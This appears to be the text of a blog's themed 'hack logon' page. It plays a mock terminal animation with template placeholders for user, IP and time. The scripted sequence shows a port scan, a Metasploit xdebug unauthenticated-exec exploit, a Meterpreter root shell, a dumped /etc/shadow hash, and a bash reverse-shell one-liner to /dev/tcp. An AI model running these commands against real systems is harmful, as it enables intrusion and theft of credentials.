__________________________________________________________________________ |Erzbir Blog Security | | Hack Logon | |__________________________________________________________________________| | | | | | username: [] | | password: [] | | | | [] | |__________________________________________________________________________| |https://github.com/Erzbir | | https://erzbir.com| |__________________________________________________________________________|Erzbir Blog, System Security Interface Version 3.0.0 Loading Security Grid... Checking Environment... ...Network.....ok ...Memory.....ok ...FileSystem.....ok Ready... **ALERT: Hacker detected!** Erzbir Blog, System Security Interface Version 3.0.0 Loading Security Grid... Checking Environment... ...Network.....ok ...Memory.....ok ...FileSystem.....ok Ready... **ALERT: Illegal content, hacker detected!** Erzbir Blog, System Security Interface Version 3.0.0 Loading Security Grid... Checking Environment... ...Network.....ok ...Memory.....ok ...FileSystem.....ok Ready... > access {{USER}} Verifying credentials... access: PERMISSION DENIED. **ALERT: Unauthorized access detected!** Erzbir Blog, System Security Interface Version 3.0.0 Loading Security Grid... Checking Environment... ...Network.....ok ...Memory.....ok ...FileSystem.....ok Ready... > access {{USER}} Verifying credentials... access: SUCCESS Erzbir Blog System 3.0.0 #1 SMP PREEMPT_DYNAMIC Sun May 14 23:02:58 CST 2024 x86_64 Last login: {{LAST_LOGIN_TIME}} from {{LOCAL_IP}} > cat /etc/shadow cat: /etc/shadow: Permission denied [INFO] Scanning target {{IP_ADDRESS}} for open ports... [INFO] Open ports detected: 80 (HTTP), 443 (HTTPS) [INFO] Enumerating services on target {{IP_ADDRESS}}... [INFO] HTTP service version: Nginx 1.27.1 [INFO] HTTPS service version: Nginx 1.27.1 > msfconsole msf6 > use exploit/unix/http/xdebug_unauth_exec msf6 exploit(unix/http/xdebug_unauth_exec) > set RHOSTS {{IP_ADDRESS}} RHOSTS => {{IP_ADDRESS}} msf6 exploit(unix/http/xdebug_unauth_exec) > set LHOST {{LOCAL_IP}} LHOST => {{LOCAL_IP}} msf6 exploit(unix/http/xdebug_unauth_exec) > set LPORT 4444 LPORT => 4444 msf6 exploit(unix/http/xdebug_unauth_exec) > exploit [*] Started reverse TCP handler on {{LOCAL_IP}}:4444 [*] {{IP_ADDRESS}}:80 - Waiting for client response. [*] {{IP_ADDRESS}}:80 - Receiving response [*] {{IP_ADDRESS}}:80 - Shell might take upto a minute to respond.Please be patient. [*] {{IP_ADDRESS}}:80 - Sending payload of size 2030 bytes [*] Sending stage (39927 bytes) to {{IP_ADDRESS}} [*] Meterpreter session 1 opened ({{LOCAL_IP}}:4444 -> {{IP_ADDRESS}}:57706) at {{TIME}} +0800 meterpreter > shell Process 29 created. Channel 0 created. > id uid=0(root) gid=0(root) groups=0(root) > cat /etc/shadow root:$5$EX3urXSr$lJ9X8XsuJzf1M32XXCudoH9iPs3Rc9Lq.vXcsXl1RT8:19957:0:99999:7::: www-data:*:19360:0:99999:7::: nobody:*:19360:0:99999:7::: > bin/bash -c 'bash -i >& /dev/tcp/{{LOCAL_IP}}/5555 0>&1' !!!Hacked in!!!